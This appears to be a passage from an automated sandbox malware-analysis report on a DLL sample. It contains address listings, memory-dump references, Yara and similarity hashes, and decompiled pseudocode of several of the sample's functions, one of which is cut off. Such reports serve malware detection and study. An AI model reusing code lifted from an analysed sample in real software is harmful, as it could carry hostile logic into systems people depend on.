                                                                                                                                                                                                                                    0x02f9b494
                                                                                                                                                                                                                                    0x02f9b497
                                                                                                                                                                                                                                    0x02f9b49c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4a5
                                                                                                                                                                                                                                    0x02f9b4a7
                                                                                                                                                                                                                                    0x02f9b4ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4b3
                                                                                                                                                                                                                                    0x02f9b4b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4bf
                                                                                                                                                                                                                                    0x02f9b4c1
                                                                                                                                                                                                                                    0x02f9b4ca
                                                                                                                                                                                                                                    0x02f9b4ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4d4
                                                                                                                                                                                                                                    0x02f9b4d7
                                                                                                                                                                                                                                    0x02f9b4d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4e0
                                                                                                                                                                                                                                    0x02f9b4e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4e4
                                                                                                                                                                                                                                    0x02f9b4e8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b4e8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3d3
                                                                                                                                                                                                                                    0x02f9b3d3
                                                                                                                                                                                                                                    0x02f9b3d3
                                                                                                                                                                                                                                    0x02f9b3da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3dc
                                                                                                                                                                                                                                    0x02f9b3dd
                                                                                                                                                                                                                                    0x02f9b3df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3df
                                                                                                                                                                                                                                    0x02f9b407
                                                                                                                                                                                                                                    0x02f9b409
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b419
                                                                                                                                                                                                                                    0x02f9b41b
                                                                                                                                                                                                                                    0x02f9b41d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b423
                                                                                                                                                                                                                                    0x02f9b42a
                                                                                                                                                                                                                                    0x02f9b456
                                                                                                                                                                                                                                    0x02f9b456
                                                                                                                                                                                                                                    0x02f9b458
                                                                                                                                                                                                                                    0x02f9b45a
                                                                                                                                                                                                                                    0x02f9b46e
                                                                                                                                                                                                                                    0x02f9b470
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b465
                                                                                                                                                                                                                                    0x02f9b466
                                                                                                                                                                                                                                    0x02f9b468
                                                                                                                                                                                                                                    0x02f9b46a
                                                                                                                                                                                                                                    0x02f9b46a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b45c
                                                                                                                                                                                                                                    0x02f9b42c
                                                                                                                                                                                                                                    0x02f9b42c
                                                                                                                                                                                                                                    0x02f9b42f
                                                                                                                                                                                                                                    0x02f9b431
                                                                                                                                                                                                                                    0x02f9b443
                                                                                                                                                                                                                                    0x02f9b443
                                                                                                                                                                                                                                    0x02f9b446
                                                                                                                                                                                                                                    0x02f9b448
                                                                                                                                                                                                                                    0x02f9b448
                                                                                                                                                                                                                                    0x02f9b449
                                                                                                                                                                                                                                    0x02f9b449
                                                                                                                                                                                                                                    0x02f9b44f
                                                                                                                                                                                                                                    0x02f9b44f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b433
                                                                                                                                                                                                                                    0x02f9b433
                                                                                                                                                                                                                                    0x02f9b433
                                                                                                                                                                                                                                    0x02f9b43a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b43c
                                                                                                                                                                                                                                    0x02f9b43c
                                                                                                                                                                                                                                    0x02f9b43d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b43d
                                                                                                                                                                                                                                    0x02f9b43f
                                                                                                                                                                                                                                    0x02f9b441
                                                                                                                                                                                                                                    0x02f9b454
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b454
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b441
                                                                                                                                                                                                                                    0x02f9b3b3
                                                                                                                                                                                                                                    0x02f9b3b6
                                                                                                                                                                                                                                    0x02f9b3b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3bb
                                                                                                                                                                                                                                    0x02f9b3bd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b3bd
                                                                                                                                                                                                                                    0x02f9b382
                                                                                                                                                                                                                                    0x02f9b384
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02F9B3F2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                                                    • Opcode ID: 0d87fd13f109235c485293535cd996bf857f6e46c2706699887f0710b583e361
                                                                                                                                                                                                                                    • Instruction ID: 0f6e3651044102a22f10b5fb400c81ca106734f33142398af40137adfe95cd0a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d87fd13f109235c485293535cd996bf857f6e46c2706699887f0710b583e361
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF61B331F046069BFF29CF2DF980B2973A2EB853DCB248529DB45C7298E771D942CA54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 01360397, Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                                                    • Opcode ID: 117cca6488b6fc0c7e92642179208c921f760515844708eca5546562275beb59
                                                                                                                                                                                                                                    • Instruction ID: b6f2bd59f6b55bb367ff3d7e3515c5f3eab09c68157c6d92b959e10cf21dbc83
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 117cca6488b6fc0c7e92642179208c921f760515844708eca5546562275beb59
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5415371900119DFDF29CF48CD85BAAB7B9FB84318F159594E9486B11AD330EE85CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 01360469, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                                                    • Opcode ID: 00dd7a5faeabe48c389b561aad31ca083426c29c9d9185e8d49efe1a840d490a
                                                                                                                                                                                                                                    • Instruction ID: 7a182d354151aa393e4b5a92532f4e4c9979b171916c5c300865ab33f6fd792f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00dd7a5faeabe48c389b561aad31ca083426c29c9d9185e8d49efe1a840d490a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1416075900115DFEB24DF58CD81B69B7B9FF88714F148194E9496B25AD370ED40CF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 013603F0, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                                                    • Opcode ID: b5d9ae38fa2fbbcf26086a426b665ed40a8c77386611467cddef06e959dbe1d3
                                                                                                                                                                                                                                    • Instruction ID: 633ad9896d2323d80da2f3b069978f3f8d0d2d157a7347841e5cf0cb328694ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5d9ae38fa2fbbcf26086a426b665ed40a8c77386611467cddef06e959dbe1d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3319371900219DFDF25CF48CD81BA9B7B9FB84328F14D194EA086B21AD330EA80CF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00402154, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                    			E00402154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E004022BB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00402375(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00402260(_t55, _t66);
										_t89 = _t66 + 0x10;
										E004022BB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00402357(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                                                                                                                    0x00402158
                                                                                                                                                                                                                                    0x00402159
                                                                                                                                                                                                                                    0x0040215a
                                                                                                                                                                                                                                    0x0040215d
                                                                                                                                                                                                                                    0x0040215f
                                                                                                                                                                                                                                    0x00402162
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x00402165
                                                                                                                                                                                                                                    0x00402166
                                                                                                                                                                                                                                    0x00402167
                                                                                                                                                                                                                                    0x0040216a
                                                                                                                                                                                                                                    0x00402174
                                                                                                                                                                                                                                    0x00402225
                                                                                                                                                                                                                                    0x0040222c
                                                                                                                                                                                                                                    0x00402235
                                                                                                                                                                                                                                    0x0040217a
                                                                                                                                                                                                                                    0x0040217a
                                                                                                                                                                                                                                    0x00402180
                                                                                                                                                                                                                                    0x00402186
                                                                                                                                                                                                                                    0x00402189
                                                                                                                                                                                                                                    0x0040218c
                                                                                                                                                                                                                                    0x00402190
                                                                                                                                                                                                                                    0x00402195
                                                                                                                                                                                                                                    0x0040219a
                                                                                                                                                                                                                                    0x0040221a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040219c
                                                                                                                                                                                                                                    0x0040219c
                                                                                                                                                                                                                                    0x004021a8
                                                                                                                                                                                                                                    0x004021aa
                                                                                                                                                                                                                                    0x00402205
                                                                                                                                                                                                                                    0x00402205
                                                                                                                                                                                                                                    0x0040220b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004021ac
                                                                                                                                                                                                                                    0x004021bb
                                                                                                                                                                                                                                    0x004021bd
                                                                                                                                                                                                                                    0x004021be
                                                                                                                                                                                                                                    0x004021bf
                                                                                                                                                                                                                                    0x004021c2
                                                                                                                                                                                                                                    0x004021c2
                                                                                                                                                                                                                                    0x004021c4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004021c6
                                                                                                                                                                                                                                    0x004021c6
                                                                                                                                                                                                                                    0x00402210
                                                                                                                                                                                                                                    0x004021c8
                                                                                                                                                                                                                                    0x004021c8
                                                                                                                                                                                                                                    0x004021cc
                                                                                                                                                                                                                                    0x004021d4
                                                                                                                                                                                                                                    0x004021d9
                                                                                                                                                                                                                                    0x004021de
                                                                                                                                                                                                                                    0x004021ea
                                                                                                                                                                                                                                    0x004021f2
                                                                                                                                                                                                                                    0x004021f9
                                                                                                                                                                                                                                    0x004021ff
                                                                                                                                                                                                                                    0x00402203
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402203
                                                                                                                                                                                                                                    0x004021c6
                                                                                                                                                                                                                                    0x004021c4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004021aa
                                                                                                                                                                                                                                    0x0040221e
                                                                                                                                                                                                                                    0x0040221e
                                                                                                                                                                                                                                    0x0040221e
                                                                                                                                                                                                                                    0x0040219a
                                                                                                                                                                                                                                    0x0040223a
                                                                                                                                                                                                                                    0x00402241

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                    • Instruction ID: 991b6e347445fc6bdfd9f5c6b66579e94d9d23a965324a07e0cc5b9e4db4a249
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1421C7329002049BCB14DFA9C9C8967B7A5BF49310B4680ADDD19AB2C5D774FA15CBE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9B11C, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                    			E02F9B11C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E02F9B287(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E02F9B341(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E02F9B22C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E02F9B287(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E02F9B323(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                                                                                                                    0x02f9b120
                                                                                                                                                                                                                                    0x02f9b121
                                                                                                                                                                                                                                    0x02f9b122
                                                                                                                                                                                                                                    0x02f9b125
                                                                                                                                                                                                                                    0x02f9b127
                                                                                                                                                                                                                                    0x02f9b12a
                                                                                                                                                                                                                                    0x02f9b12b
                                                                                                                                                                                                                                    0x02f9b12d
                                                                                                                                                                                                                                    0x02f9b12e
                                                                                                                                                                                                                                    0x02f9b12f
                                                                                                                                                                                                                                    0x02f9b132
                                                                                                                                                                                                                                    0x02f9b13c
                                                                                                                                                                                                                                    0x02f9b1ed
                                                                                                                                                                                                                                    0x02f9b1f4
                                                                                                                                                                                                                                    0x02f9b1fd
                                                                                                                                                                                                                                    0x02f9b142
                                                                                                                                                                                                                                    0x02f9b142
                                                                                                                                                                                                                                    0x02f9b148
                                                                                                                                                                                                                                    0x02f9b14e
                                                                                                                                                                                                                                    0x02f9b151
                                                                                                                                                                                                                                    0x02f9b154
                                                                                                                                                                                                                                    0x02f9b158
                                                                                                                                                                                                                                    0x02f9b15d
                                                                                                                                                                                                                                    0x02f9b162
                                                                                                                                                                                                                                    0x02f9b1e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b164
                                                                                                                                                                                                                                    0x02f9b164
                                                                                                                                                                                                                                    0x02f9b170
                                                                                                                                                                                                                                    0x02f9b172
                                                                                                                                                                                                                                    0x02f9b1cd
                                                                                                                                                                                                                                    0x02f9b1cd
                                                                                                                                                                                                                                    0x02f9b1d3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b174
                                                                                                                                                                                                                                    0x02f9b183
                                                                                                                                                                                                                                    0x02f9b185
                                                                                                                                                                                                                                    0x02f9b186
                                                                                                                                                                                                                                    0x02f9b187
                                                                                                                                                                                                                                    0x02f9b18a
                                                                                                                                                                                                                                    0x02f9b18a
                                                                                                                                                                                                                                    0x02f9b18c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b18e
                                                                                                                                                                                                                                    0x02f9b18e
                                                                                                                                                                                                                                    0x02f9b1d8
                                                                                                                                                                                                                                    0x02f9b190
                                                                                                                                                                                                                                    0x02f9b190
                                                                                                                                                                                                                                    0x02f9b194
                                                                                                                                                                                                                                    0x02f9b19c
                                                                                                                                                                                                                                    0x02f9b1a1
                                                                                                                                                                                                                                    0x02f9b1a6
                                                                                                                                                                                                                                    0x02f9b1b2
                                                                                                                                                                                                                                    0x02f9b1ba
                                                                                                                                                                                                                                    0x02f9b1c1
                                                                                                                                                                                                                                    0x02f9b1c7
                                                                                                                                                                                                                                    0x02f9b1cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b1cb
                                                                                                                                                                                                                                    0x02f9b18e
                                                                                                                                                                                                                                    0x02f9b18c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9b172
                                                                                                                                                                                                                                    0x02f9b1e6
                                                                                                                                                                                                                                    0x02f9b1e6
                                                                                                                                                                                                                                    0x02f9b1e6
                                                                                                                                                                                                                                    0x02f9b162
                                                                                                                                                                                                                                    0x02f9b202
                                                                                                                                                                                                                                    0x02f9b209

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                    • Instruction ID: 44e34a1159d628295a6f26bebca98574543b3051ba11cd12e0899e5b9d6c7269
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21A1329002049FEB14EF68DC809ABBBA5FF443A4B4581A8DA559B245E730FA55CBE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 01360066, Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                                                                                                                                                                                                    • Instruction ID: 059581c573e862f4b8ee63126a68fb17cb25446cf25fa26084240c671de4b550
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a927edfd22bb6a87c59e064a0d897be9f8ff1fc4e048460ef94ea895cfa2374a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0B6B1901119AEEF15CA54CC48FAAB7BDEBC8700F1081D5E60CAA150D2309E808F60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 01360285, Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                                                                                                                                                                                                    • Instruction ID: 7de7b67859fb6ddd3c67e754c78e0e23f1aa6d1421b3ddbf00fea5fa86828bde
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64181d5a1a0adb3b83a868520eb234369a1b34ebae05e35cc0e8b6d16c9ba115
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59D09235E0016A9BCF24EA54CA5979EF3B6EF8D314F1500C8D50C3730087342E86CE40
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9A279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                    			E02F9A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
